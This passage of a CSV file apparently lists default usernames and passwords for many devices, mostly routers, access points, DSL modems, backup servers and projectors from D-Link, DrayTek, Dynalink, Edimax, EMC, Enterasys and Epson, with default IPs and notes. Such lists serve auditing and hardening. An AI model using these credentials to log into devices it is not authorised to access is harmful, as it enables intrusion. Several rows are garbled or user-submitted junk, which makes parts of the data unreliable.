firewall,,http://192.168.1.1,admin,admin,Admin,,\ndlink,DGL-4100,,http://192.168.0.1,,,Administration,,\ndlink,DGL-4100,,http://192.168.0.1,admin,,Administration,,\ndlink,DGL-4300,,http://192.168.0.1,,,Administration,,\ndlink,DGL-4300,,http://192.168.0.1,admin,,Administration,,\ndlink,DGL-4500,,http://192.168.0.1,,,Administration,,\ndlink,DGL-4500,,http://192.168.1.1,admin,admin,Administration,,\ndlink,DI-102,All,192.168.229.61,admin,,2012-01-08,,\ndlink,DI-106,,,administrator,@*nigU^D.ha,,winnt,\ndlink,DI-206 ISDN router,,,Admin,Admin,,1.*,\ndlink,DI-514 Router,,HTTP,admin,,,,\ndlink,DI-514,,Multi,user,,Admin,,\ndlink,DI-524,all version,http://192.168.0.1,,,admin,please di-524 user and password send me,\ndlink,DI-524,all,HTTP,admin,,Admin,http://192.168.0.1,\ndlink,DI-524,all,HTTP,user,,User,,\ndlink,DI-524,all,http://192.168.0.1,admin,,Admin,,\ndlink,DI-524UP,all,http://192.168.0.1,admin,,Admin,,\ndlink,DI-604,,HTTP,user,,Admin,,\ndlink,DI-604,1.62b+,HTTP,admin,,Admin,,\ndlink,DI-604,2.02,HTTP,admin,admin,Admin,,\ndlink,DI-604,rev a rev b rev c rev e,Multi,admin,,Admin,http://192.168.0.1,\ndlink,DI-614+,,HTTP,admin,,Admin,,\ndlink,DI-614+,,HTTP,admin,admin,Admin,,\ndlink,DI-614+,,HTTP,user,,User,,\ndlink,DI-614+,any,HTTP,admin,,Admin,all access :D,\ndlink,DI-614,,HTTP,admin,,Admin,,\ndlink,DI-624+,,HTTP,admin,,,,\ndlink,DI-624+,A3,HTTP,admin,admin,Admin,,\ndlink,DI-624,,http://192.168.0.1,Admin,,admin,,\ndlink,DI-624,,http://192.168.0.1,admin,password,admin,,\ndlink,DI-624,all,HTTP,User,,Admin,,\ndlink,DI-624M,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-624S,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-634M,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-701,,Multi,admin,year2000,Admin,,\ndlink,DI-701,unknown,Multi,admin,year2000,Admin,,\ndlink,DI-704,,Multi,,admin,Admin,,\ndlink,DI-704,rev a,Multi,,admin,Admin,Cable/DSL Routers/Switches,\ndlink,DI-704P,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-704UP,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-707,,http://192.168.0.1,,admin,Admin,,\ndlink,DI-707P,,HTTP,admin,,Admin,,\ndlink,DI-707P,,http://192.168.0.1,admin,,Admin,,\ndlink,DI-711,,http://192.168.0.1,admin,,Admin,,\ndlink,DI-713,,http://192.168.0.1,,admin,Admin,,\ndlink,DI-713P,,http://192.168.0.1,,admin,Admin,,\ndlink,DI-714 Router,,HTTP,admin,,,,\ndlink,DI-714P+,,Multi,admin,,192.168.0.1,,\ndlink,DI-724GU,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-724P+ Router,,HTTP,admin,,,,\ndlink,DI-724U,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-754,,http://192.168.0.1,admin,,Admin,,\ndlink,DI-764,,HTTP,admin,,Admin,,\ndlink,DI-774,,http://192.168.0.1,admin,,Admin,,\ndlink,DI-784 Router,,HTTP,admin,,,,\ndlink,DI-804,v2.03,Multi,admin,,Admin,,\ndlink,DI-804HV,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-804V,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-808HV,,http://192.168.0.1,admin,,Administration,,\ndlink,DI-824VUP Airplus G Wireless VPN Router,,http://192.168.0.1,admin,,Administrator,,\ndlink,DI-824VUP+,,http://192.168.0.1,admin,password,Administrator,,\ndlink,DI-LB604,,http://192.168.0.1,admin,,Administration,,\ndlink,DIR-130,,http://192.168.0.1,admin,,administrator,,\ndlink,DIR-300,,192.168.0.1,admin,blank,administrator,,\ndlink,DIR-300,,telnet 192.168.0.1,root,,shell,,\ndlink,DIR-300,1,192.168.0.1,admin,admin,Admin,,\ndlink,DIR-300,ALL VERSION,http://192.168.0.1,admin,,,,\ndlink,DIR-320,,http://192.168.0.1,admin,,administrator,,\ndlink,DIR-330,,http://192.168.0.1,admin,,administrator,,\ndlink,DIR-412,,http://192.168.0.1,admin,,administrator,,\ndlink,DIR-450,,http://192.168.0.1,admin,,administrator,,\ndlink,DIR-451,,http://192.168.0.1,admin,,administrator,,\ndlink,DIR-501,,http://192.168.0,1,admin,,2012-01-08,\ndlink,DIR-505L,,http://dlinkrouter or http://dlinkrouter.local (Mac) or http://192.168.0.1,admin,,Admin,Default SSID and Wi-fi password are on the supplied info card.,\ndlink,DIR-515,,http://192.168.0,1,admin,,2012-01-08,\ndlink,DIR-600,3.02,http://192.168.0.1,admin,,,,\ndlink,DIR-600L,,http://192.168.0.1,admin,,,,\ndlink,DIR-601,all versons,http://,,,admin,,\ndlink,DIR-605,,http://192.168.0.1,admin,,,,\ndlink,DIR-605L,,http://192.168.0.1,admin,,,,\ndlink,DIR-615 ,3.01,192.168.01 ,,family,family,,\ndlink,DIR-615,,http://192.168.0.1,admin,,administrator,,\ndlink,DIR-615,1.0.0,http://192.168.0.1,admin,admin,admin,admin,\ndlink,DIR-615,1.10(I),http://192.168.0.1,Admin,,Admin,mantra88dotcom,\ndlink,DIR-615,2,,admin,admin,,,\ndlink,DIR-615,Ver.1.10(I),http://192.168.0.1). ,Admin,,Admin,mantra88dotcom,\ndlink,DIR-615,l1,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-625,,http://192.168.0.1,admin,,administrator,,\ndlink,DIR-628,,http://192.168.0.1,admin,,Admin,,\ndlink,DIR-635,,http://192.168.0.1,Admin,,Administration,,\ndlink,DIR-645,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-651,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-655,,,admin,blank,,,\ndlink,DIR-655,,http://192.168.0.1,admin,,Administration,,\ndlink,DIR-657,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-660,,http://192.168.0.1,admin,,Administration,,\ndlink,DIR-665,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-685,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-810L,,http://dlinkrouter or http://dlinkrouter.local or http://192.168.0.1,admin,,Admin,Default SSID and Wi-fi password are on the supplied info card.,\ndlink,DIR-815,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-816L,,http://dlinkrouter.local./ or http://192.168.0.1,admin,,Admin,Default SSID and Wi-fi password are on the supplied info card.,\ndlink,DIR-818LW,,http://dlinkrouter.local./ or http://192.168.0.1,admin,,Admin,Default SSID and Wi-fi password are on the supplied info card.,\ndlink,DIR-820L,,http://dlinkrouter.local./ or http://192.168.0.1,admin,,Admin,Default SSID and Wi-fi password are on the supplied info card.,\ndlink,DIR-822,rev.A,B,C,192.168.0.1,,Admin,\ndlink,DIR-825,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-826L,,http://dlinkrouter or http://192.168.0.1,admin,,Admin,Default SSID and Wi-fi password are on the supplied info card.,\ndlink,DIR-827,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-835,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-842,gigabit router,192.168.0.1,,,Admin,,\ndlink,DIR-850L,,http://192.168.0.1 or http://dlinkrouter.local,(),,Admin,,\ndlink,DIR-855,,http://192.168.0.1,admin,,Administration,,\ndlink,DIR-857,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-859,router,192.168.0.1,,,Admin,,\ndlink,DIR-868L,,http://192.168.0.1 or http://dlinkrouter.local,(),,Admin,,\ndlink,DIR-880L,,http://192.168.0.1 or http://dlinkrouter.local,(),,Admin,,\ndlink,DIR-890L,,http://192.168.0.1,Admin,,Admin,,\ndlink,DIR-895L,router,192.168.0.1,,,Admin,,\ndlink,DKVM-16 16-port keyboard/video/mouse switch,,,,0,,,\ndlink,DKVM-16 16-port keyboard/video/mouse switch,,,,00000000,,,\ndlink,DNR-202L,Network Video Recorder,DHCP,admin,(configured in setup),Admin,,\ndlink,DNR-322L,Network Video Recorder,DHCP,admin,,Admin,,\ndlink,DSA-3100,All,http://192.168.0.40,admin,admin,Admin,,\ndlink,DSA-3100,All,http://192.168.0.40,manager,manager,User Management Options,,\ndlink,DSA-3200,All,http://192.168.0.40,admin,admin,Admin,,\ndlink,DSA-5100,All,http://192.168.0.40,admin,admin,Admin,,\ndlink,DSA-5100,All,http://192.168.0.40,manager,manager,User Management Options,,\ndlink,DSL Router,,,root,admin,Administrator,,\ndlink,DSL-2640B,DSL-2640B,http://192.168.1.1/,,,Telekom,,\ndlink,DSL-2640T,1.00(1),192.168.1.1,88612421,2421D,ADMIN,ADMIN,\ndlink,DSL-2640T,1.00(1),192.168.I.I,88612421,2421D,ADMIN,ADMIN,\ndlink,DSL-2642B,All,192.168.1.1,admin,admin,Admin,,\ndlink,DSL-2730B,All,192.168.1.1,admin,admin,Admin,,\ndlink,DSL-2730U,C1,192.168.1.1,admin,admin,admin,forget my password and username,\ndlink,DSL-2750B,All,192.168.1.1,admin,admin,Admin,,\ndlink,DSL-2750U,All,192.168.1.1,admin,admin,Admin,,\ndlink,DSL-300,?,Telnet,,private,,,\ndlink,DSL-300G+,7.1.0.30,Telnet,,private,admin?,,\ndlink,DSL-300g+,Teo,HTTP,admin,admin,Admin,,\ndlink,DSL-300g+,Teo,Telnet,,private,Admin,,\ndlink,DSL-302G,,Multi,admin,admin,Admin,,\ndlink,DSL-500,,Multi,admin,admin,Admin,,\ndlink,DSL-502T,,http://10.1.1.1,admin,admin,Admin,,\ndlink,DSL-504,,HTTP,,private,Admin,,\ndlink,DSL-504G,,http://10.1.1.1,admin,admin,Admin,also try IP 192.168.1.254,\ndlink,DSL-504T,,http://10.1.1.1,admin,admin,Admin,,\ndlink,DSL-526B,All,192.168.1.1,admin,admin,Admin,,\ndlink,DSL-604+,,,admin,admin,Admin,,\ndlink,DSL-604T,,10.1.1.1,admin,admin,Admin,,\ndlink,DSL-G604T,,http://10.1.1.1,admin,admin,Admin,,\ndlink,DSL-G624T,?,? via WAN ...,root,admin,Admin,,\ndlink,DSL-G664T,A1,HTTP,admin,admin,Admin,SSID : G664T_WIRELESS,\ndlink,DSL-G804V,,192.168.1.1,admin,admin,Admin,,\ndlink,DSL500G,,Multi,admin,admin,Admin,,\ndlink,DSR-1000,All,http://192.168.10.1,admin,admin,Admin,,\ndlink,DSR-1000N,All,http://192.168.10.1,admin,admin,Admin,,\ndlink,DSR-250N,All,http://192.168.10.1,admin,admin,Admin,,\ndlink,DSR-500,All,http://192.168.10.1,admin,admin,Admin,,\ndlink,DSR-500N,All,http://192.168.10.1,admin,admin,Admin,,\ndlink,DVA-G3304A,,10.1.1.1,admin,admin,Admin,,\ndlink,DVA-G3670B,,10.1.1.1,admin,admin,Admin,,\ndlink,DVG-1402S,,10.1.1.1,admin,admin,Admin,,\ndlink,DVG-2001S,,10.1.1.1,admin,admin,Admin,,\ndlink,DVG-2101SP,,193.168.1.150,admin,,Admin,,\ndlink,DVG-G1402S,,192.168.15.1,admin,admin,Admin,,\ndlink,DWC-1000,Rev.A and B,192.168.0.1,admin,admin,Admin,,\ndlink,DWL-1000+,,HTTP,admin,,Admin,,\ndlink,DWL-1000,,HTTP,admin,,Admin,,\ndlink,DWL-1000AP+,,http://192.168.0.50,admin,,Admin,,\ndlink,DWL-1700AP,,http://192.168.0.50:2000,admin,root,,,\ndlink,DWL-1750,,http://192.168.0.50:2000,admin,root,,,\ndlink,DWL-2000AP+,1.13,HTTP,admin,,Admin,Wireless Access Point,\ndlink,DWL-2100AP,,AP Mgr or D-View Module or http://192.168.0.50,admin,,,,\ndlink,DWL-210AP,1.03,Wireless,admin,,,,\ndlink,DWL-2200AP,,AP Mgr or D-View Module or http://192.168.0.50,admin,,,,\ndlink,DWL-2210AP,,http://192.168.0.50,admin,admin,,,\ndlink,DWL-2700AP,,MIB or AP Mgr or D-View Module or http://192.168.0.50,admin,,,,\ndlink,DWL-3150,,http://192.168.0.30,admin,,Administration,default SSID is 'dlink',\ndlink,DWL-3200AP,,AP Mgr or D-View Module or http://192.168.0.50,admin,,,,\ndlink,DWL-3200AP,,http://192.168.1.199,,,admin,,\ndlink,DWL-5000AP,,http://192.168.0.50,admin,,,,\ndlink,DWL-6000AP,Rev.A and Rev.B,multi interfaces incl. http://192.168.0.50,admin,,,,\ndlink,DWL-614+,2.03,HTTP,admin,,Admin,,\ndlink,DWL-614+,rev a rev b,HTTP,admin,,Admin,http://192.168.0.1,\ndlink,DWL-7000AP,,http://192.168.0.50 or AP Mgr,admin,,,,\ndlink,DWL-700AP,,http://192.168.0.50,admin,,Admin,,\ndlink,DWL-7100AP,,http://192.168.0.50,admin,,Administration,,\ndlink,DWL-7200AP,,http://192.168.0.50,admin,,Administration,,\ndlink,DWL-7700AP,Rev. A and Rev. B,mutli console,admin,,Administration,default IP 192.168.0.50,\ndlink,DWL-810+,,http://192.168.0.30,admin,,Admin,,\ndlink,DWL-810,,http://192.168.0.30,admin,,Admin,,\ndlink,DWL-8200AP,,multi console,admin,,,default IP 192.160.0.50,\ndlink,DWL-8200AP,,multi console,admin,,,default IP 192.168.0.50 (/! Previous indication in the page is false!),\ndlink,DWL-8200AP,,multi console,admin,,,default IP 192.168.0.50 (/!\\ Previous indication in the page is false!),\ndlink,DWL-900+,,HTTP,admin,,Admin,,\ndlink,DWL-900,,,admin,public,Admin,,\ndlink,DWL-900AP+,,,Admin,1970,,,\ndlink,DWL-900AP+,rev a rev b rev c,HTTP,admin,,Admin,http://192.168.0.50,\ndlink,DWL-900AP,,Multi,,public,Admin,,\ndlink,DWL-900AP,,Multi,admin,public,Admin,,\ndlink,DWL-900AP,,USB/SNMP,,public,Admin,default IP 192.168.0.20,\ndlink,DWL-AG700AP,,http://192.168.0.50,admin,,Administration,,\ndlink,DWL-G700AP,,HTTP,admin,,,,\ndlink,DWL-G700AP,,http://192.168.0.50/,admin,olinda,,,\ndlink,DWL-G710,,http://192.168.0.30,admin,,Administration,,\ndlink,DWL-G730AP,,http://192.168.0.30,admin,,Administration,,\ndlink,DWL-G800AP,,http://192.168.0.30,admin,,Administration,,\ndlink,DWL-G810,,192.168.1.30,admin,,Admin,,\ndlink,DWL-G820,,http://192.168.0.35,admin,,Administration,,\ndlink,DWS-3160-24PC,,RS-232 console,admin,admin,Admin,Default IP is 10.90.90.90,\ndlink,DWS-3600AP,,10.90.90.90,admin,,Admin,Also has RS-232 console admin,\ndlink,DWS-4026,,10.90.90.90,admin,,Admin,Also has RS-232 console admin,\ndlink,DWS-6600AP,,10.90.90.90,admin,,Admin,Also has RS-232 console admin,\ndlink,DWS-8600AP,,10.90.90.90,admin,,Admin,Also has RS-232 console admin,\ndlink,EBR-2310,,http://192.168.0.1,admin,,Administration,,\ndlink,KR-1,All,http://192.168.0.1,admin,,Admin,,\ndlink,N300,rev.A,http://192.168.0.1,admin,,,,\ndlink,TM-G5240,All,http://192.168.0.1,,admin,Admin,,\ndlink,WBR-1310,,http://192.168.0.1,admin,,Administration,,\ndlink,WBR-1310,2.0,192.168.0.1,volcom75,1987197500,,problem speed low,\ndlink,WBR-2310,,http://192.168.0.1,admin,,Administration,,\ndlink,WBR-2310,a1 1.02,192.168.0.1,D Link 25,,,,\ndlink,WBR-2310,revB,http://192.168.0.1,admin,,Administration,,\ndlink,Windows XP,Windows XP,192.168.0.1,admin,password,admin,amdin,\ndlink,hubs/switches,,Telnet,D-Link,D-Link,,,\ndlink,wbr-2310,a1 1.02,192.168.0.1,D Link 25,,,,\ndlink,windows xp,all,192.168.0.1,admin,,,,\ndovado,Tiny,,192.168.0.1,admin,password,Admin,,\ndovado,WRG (Wireless Residential Gateway),,192.168.0.1,admin,password,Admin,,\ndraytek,Vigor 120,,192.168.1.1,,,Admin,,\ndraytek,Vigor 2110,,192.168.1.1,admin,admin,Admin,,\ndraytek,Vigor 2130Vn,,192.168.1.1,admin,admin,Admin,,\ndraytek,Vigor 2200 USB,,,admin,,Admin,,\ndraytek,Vigor 2500,,192.168.1.1,admin,admin,Admin,,\ndraytek,Vigor 2500V,,192.168.1.1,admin,admin,Admin,,\ndraytek,Vigor 2600 Plus Series,Annex A,HTTP,admin,,Admin,,\ndraytek,Vigor 2600,,HTTP,admin,,Admin,,\ndraytek,Vigor 2600G,,192.168.1.1,,,Admin,,\ndraytek,Vigor 2600Ge,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2700G,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2700Ge,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2700VG,,192.168.1.1,,admin,Admin,,\ndraytek,Vigor 2700e,,192.168.1.1,,,Admin,,\ndraytek,Vigor 2710,,192.168.1.1,admin,admin,Admin,,\ndraytek,Vigor 2710Vn,,192.168.1.1,admin,admin,Admin,default username is reported to be unchangeable,\ndraytek,Vigor 2710n,,192.168.1.1,admin,admin,Admin,,\ndraytek,Vigor 2800,,192.168.1.1,,,Admin,,\ndraytek,Vigor 2800VG,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2820,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2820G,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2820Vn,,192.168.1.1,admin,admin,Admin,,\ndraytek,Vigor 2820n,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2900+,,HTTP,admin,admin,Admin,,\ndraytek,Vigor 2900,,192.168.1.1,,,Admin,,\ndraytek,Vigor 2900G,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2900V,,192.168.1.1,,,Admin,,\ndraytek,Vigor 2900VG,,192.168.1.1,draytek,,Admin,,\ndraytek,Vigor 2910,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2910G,,192.168.1.1,admin,,Admin,,\ndraytek,Vigor 2910VG,,192.168.1.1,,,Admin,,\ndraytek,Vigor,all,HTTP,admin,admin,Admin,,\ndreambox,All models,all versions,http, telnet,root,dreambox,,\ndreambox,All models,all versions,http,telnet,root,dreambox,gives access to a busybox allowing to control the box using basic unix commands embedded into busybox,\ndrupal.org,Drupal,,administrator,admin,admin,,,\ndupont,Digital Water Proofer,,,root,par0t,,,\ndynalink,RTA020,,,admin,private,,,\ndynalink,RTA020,,Admin,admin,private,,,\ndynalink,RTA020,,Multi,admin,private,Admin,,\ndynalink,RTA100+,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA100+,,192.168.1.1,admin,root,Admin,,\ndynalink,RTA100+,,192.168.1.1,root,root,Root,,\ndynalink,RTA100,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA100,,192.168.1.1,root,root,Root,,\ndynalink,RTA1025W,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA1025W,,console,http//192.168.1.1,admin,admin,,\ndynalink,RTA1030W,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA1046VW,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA1320,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA1320,,console,http//192.168.1.1,admin,admin,,\ndynalink,RTA1335,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA1335,,console,http//192.168.1.1,admin,admin,,\ndynalink,RTA220,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA230,,,userNotUsed,userNotU,,,\ndynalink,RTA230,,,userNotUsed,userNotU,Admin,,\ndynalink,RTA230,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA230,,Multi,admin,admin,Admin,,\ndynalink,RTA300,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA300W,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA770,,192.168.1.1,admin,admin,Admin,,\ndynalink,RTA770W,,192.168.1.1,admin,admin,Admin,,\ndynamode,BR-6004,,http,guest,guest,Standard admin access,,\ndynix library systems,Dynix,,,LIBRARY,,,,\ndynix library systems,Dynix,,,SETUP,,,,\ndynix library systems,Dynix,,,circ,,,,\ndynix library systems,Dynix,,,circ,,,,\ndynix library systems,Dynix,,Admin,SETUP,,,,\ndynix library systems,Dynix,,User,LIBRARY,,,,\ndynixlibrarysystems,Dynix,,Multi,LIBRARY,,User,,\ndynixlibrarysystems,Dynix,,Multi,SETUP,,Admin,,\ndynixlibrarysystems,Dynix,,Multi,circ,(social security number),User,,\ne-tech,Router,,Admin,,admin,,,\neaton,ePDU,,,admin,admin,,,\necheloncorporation,i.LON Multiple,,,ilon,ilon,,,\necon,Econ DSL Router,,Router,admin,epicrouter,Admin,DSL Router,\nedimax,.,,,admin,1234,,,\nedimax,.,,Multi,admin,1234,,,\nedimax,6114wg,1.83,192.168.2.1,admin,1234,,,\nedimax,7205APL,,,guest,1234,,,\nedimax,7205APL,,,guest,1234,Guest - allows backup of config.bin,attacker can gain all passwords,\nedimax,AR-6004,,,admin,1234,,,\nedimax,AR-7024,,,admin,epicrouter,,,\nedimax,AR-7024WG,,Default IP: 10.0.0.2,admin,epicrouter,Admin,,\nedimax,AR-7024Wg,,Admin,admin,epicrouter,,,\nedimax,AR-7064Sg+A,,Default IP: 10.0.0.2,admin,epicrouter,Admin,,\nedimax,AR-7084A,,192.168.2.1,admin,1234,Admin,,\nedimax,AR-7084gA,,ipod,admin/1234,,,,\nedimax,AR-7084gA,3.0A,http://192.168.2.1,admin,1234,Admin,,\nedimax,AR728WnA19Mc04792,v1.0,192.168.2.1,admin,1234,1234,,\nedimax,BR 4000+ Router,,,admin,password,,,\nedimax,BR 4000+ Router,all,HTTP,admin,password,,,\nedimax,BR-6204,wg,http://192.168.2.1,admin,1234,admin,,\nedimax,BR-6204WG,,Default IP: 192.168.2.1,admin,1234,,,\nedimax,BR-6524K,,Default IP: 192.168.2.1,admin,1234,,,\nedimax,BR-6524WP,,Default IP: 192.168.2.1,admin,1234,,,\nedimax,BR-6524n,,Default IP: 192.168.2.1,admin,1234,,,\nedimax,BR-7209WG,,Default IP: 192.168.2.1,admin,1234,,,\nedimax,Broadband Router,Hardware: Rev A. Boot Code: 1.0 Runtime Code 2.63,HTTP,admin,1234,Admin,,\nedimax,ES-5224RXM,,Multi,admin,123,Admin,,\nedimax,EW-7205APL,Firmware release 2.40a-00,Multi,guest,,Admin,,\nedimax,EW-7206apg,,,admin,1234,,,\nedimax,LT-6408n,3G-6408n,all versions,http://192.168.2.1/index.asp,admin,1234,web administration,\nedimax,Wireless ADSL Router,AR-7024,Multi,admin,epicrouter,Admin,,\nedimax,br-6204,wg,http://192.168.2.1,admin,1234,admin,,\nefficient networks,5851 SDSL Router,,,,hs7mwxkk,,,\nefficient networks,5851 SDSL Router,,Admin,,hs7mwxkk,,,\nefficient networks,EN 5861,,,login,admin,,,\nefficient networks,EN 5861,,Admin,login,admin,,,\nefficient networks,Speedstream 5711,,Admin,,4getme2,,,\nefficient networks,Speedstream 5711,,Teledanmark version (only .dk),,4getme2,,,\nefficient,5871 DSL Router,,Admin,login,admin,,,\nefficient,5871 DSL Router,,v 5.3.3-0,login,admin,,,\nefficient,Speedstream DSL,,,,admin,,,\nefficient,Speedstream DSL,,Admin,,admin,,,\nefficientnetworks,5800 Class DSL Routers,all,Multi,login,admin,Admin,,\nefficientnetworks,5851 SDSL Router,N/A,Console,,hs7mwxkk,Admin,On some Covad Routers,\nefficientnetworks,5851,,Telnet,login,password,Admin,might be all 5800 series,\nefficientnetworks,5871 DSL Router,v 5.3.3-0,Multi,login,admin,Admin,,\nefficientnetworks,5871 DSL Router,v 5.3.3-0,Multi,login,admin,Admin,This is for access to HTTP admin console.,\nefficientnetworks,EN 5861,,Telnet,login,admin,Admin,,\nefficientnetworks,Speedstream DSL,,Telnet,,admin,Admin,,\nefficientnetworks,Speedstream,5200,http/telnet,,,,Default IP 10.0.0.1/8,\nefficientnetworks,Speedstream,5600,http/telnet,,,,Default IP 10.0.0.1/8,\nefficientnetworks,Speedstream,5711 Teledanmark version (only .dk),Console,,4getme2,Admin,,\nefficientnetworks,Speedstream,57xx series,http/telnet,login,admin,,Default IP 192.168.254.254/24,\nefficientnetworks,Speedstream,59xx series,http/telnet,login,admin,,Default IP 192.168.254.254/24,\nefficientnetworks,Speedstream,various,http/telnet,superuser,admin,Admin,,\nefficinet networks,5800 Class DSL Routers,,Admin,login,admin,,,\nefficinet networks,5800 Class DSL Routers,,all,login,admin,,,\negenera,all models,all version,http, ssh, console,root,root,\negenera,all models,all version,http,ssh,console,root,root,\nektron,CMS400.NET,,,builtin,builtin,,,\nelron,Firewall,,,(hostname/ipaddress),sysadmin,,,\nelronsoftware,Elron Firewall,2.5c,,hostname/ip address,sysadmin,Admin,,\nelsa,LANCom Office ISDN Router,,800/1000/1100,,,,,\nelsa,LANCom Office ISDN Router,,Admin,,,,,\nelsa,LANCom Office ISDN Router,,Admin,,cisco,,,\nelsa,LANCom Office ISDN Router,1000,Telnet,,,Admin,,\nelsa,LANCom Office ISDN Router,1000,Telnet,,cisco,Admin,,\nelsa,LANCom Office ISDN Router,1100,Telnet,,,Admin,,\nelsa,LANCom Office ISDN Router,1100,Telnet,,cisco,Admin,,\nelsa,LANCom Office ISDN Router,800,Telnet,,,Admin,,\nelsa,LANCom Office ISDN Router,800,Telnet,,cisco,Admin,,\nemachines,notebook,,,emaq,4133,,,\nemc,Avamar Deduplication Backup Server,,,MCUser,MCUser1,,,\nemc,Avamar Deduplication Backup Server,,,admin,changeme,,,\nemc,Avamar Deduplication Backup Server,,,backuponly,backuponly1,,,\nemc,Avamar Deduplication Backup Server,,,backuprestore,backuprestore1,,,\nemc,Avamar Deduplication Backup Server,,,dpn,changeme,,,\nemc,Avamar Deduplication Backup Server,,,restoreonly,restoreonly1,,,\nemc,Avamar Deduplication Backup Server,,,root,8RttoTriz,,,\nemc,Avamar Deduplication Backup Server,,,root,changeme,,,\nemc,Avamar Deduplication Backup Server,,,viewuser,viewuser1,,,\neminent,EM4114,,,admin,admin,Administrator,,\nencad,XPO,,,,,,,\nencad,XPO,,Admin,,,,,\nencad,XPO,,Multi,,,Admin,,\nengenius,EAP-3660,,192.168.1.1,admin,admin,Admin,,\nengenius,ECB-3220,,192.168.1.1,admin,admin,Admin,Client Bridge Admin,\nengenius,ECB-3220,,192.168.1.2,admin,admin,Admin,Access Point Admin,\nengenius,ECB-3500,,192.168.1.1,admin,admin,Admin,,\nengenius,EOC-2610,,192.168.1.1,admin,admin,Admin,,\nengenius,ESR-6650,,192.168.0.1,admin,admin,Admin,,\nengenius,ESR-9752,,192.168.0.1,admin,admin,Admin,,\nenhydra,Multiserver,,,admin,enhydra,,,\nenhydra,Multiserver,,,admin,enhydra,Admin,,\nenox,PC BIOS,,,,xo11nE,,,\nenox,PC BIOS,,Admin,,xo11nE,,,\nenox,PC BIOS,,Console,,xo11nE,Admin,,\nenterasys,ANG-1105,,Admin,,netadmin,,,\nenterasys,ANG-1105,,Admin,admin,netadmin,,,\nenterasys,ANG-1105,,HTTP,admin,netadmin,Admin,default IP is 192.168.1.1,\nenterasys,ANG-1105,,Telnet,,netadmin,Admin,default IP is 192.168.1.1,\nenterasys,ANG-1105,,unknown,,netadmin,,,\nenterasys,ANG-1105,,unknown,admin,netadmin,,,\nenterasys,ANG-1105,unknown,HTTP,admin,netadmin,Admin,default IP is 192.168.1.1,\nenterasys,ANG-1105,unknown,Telnet,,netadmin,Admin,default IP is 192.168.1.1,\nenterasys,SecureStack A2,,,admin,,,,\nenterasys,Vertical Horizon,ANY,Multi,admin,,Admin,this works in telnet or http,\nenterasys,Vertical Horizon,VH-2402S,Multi,tiger,tiger123,Admin,,\nentrust,Get Access Service Control Agent,,4.x,admin,admin,,,\nentrust,GetAccess,4.x,http,admin,admin,Admin,,\nentrust,GetAccess,4.x,http,websecadm,changeme,Admin,Access to Admin Gui via /sek-bin/login.gas.bat,\nentrust,GetAccess,7.x,http,websecadm,changeme,Admin,Access to Admin Gui via /sek-bin/login.gas.bat,\nepiserverab,EPiServer Commerce,,,admin,store,,,\nepox,PC BIOS,,,,central,,,\nepox,PC BIOS,,Admin,,central,,,\nepox,PC BIOS,,Console,,central,Admin,,\nepson,BrightLink 455Wi,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,EX100,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,EX21,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,EX30,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,EX31,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,EX70,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,EX71,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,EX91,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,MegaPlex MG-50,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,MegaPlex MG-850HD,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,MovieMate 72,,,,000000,,,\nepson,MovieMate 85HD,,,,000000,,,\nepson,PowerLite 1220,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 1716,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 1725,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 1751,,,,0000,,,\nepson,PowerLite 